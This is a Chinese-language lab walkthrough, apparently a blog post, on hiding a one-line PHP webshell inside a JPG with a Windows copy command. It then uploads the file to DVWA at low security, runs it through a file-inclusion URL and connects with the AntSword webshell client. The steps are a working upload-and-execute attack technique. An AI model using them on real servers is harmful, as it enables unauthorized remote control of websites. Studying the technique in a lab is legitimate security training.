首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg -b是指以二进制的方式合并复制文件,用于图像影音类文件 -a是指以ascii方式合并复制文件,用于文本类文件 然后发现在原来的路径中已经生成了我们想要的文件4.在靶机环境中上传我们的文件,上传成功会爆路径复制路径到url打开5.但光是上传上去仍然不够,我们还需要一个脚本来执行我们的文件。
show_source(__file__);
}
?>
上传方式有多种,这里我就将dvwa开最低直接传上去了然后我们把爆出来的地址复制到url上最后我们利用file参数将我们之前上传的jshell.jpg文件匹配进去
http://192.168.132.188/DVWA/hackable/uploads/include.php?file=jshell.jpg
6.然后我们开蚁剑进行配置连接,将本网页的url复制进去可以进目录
|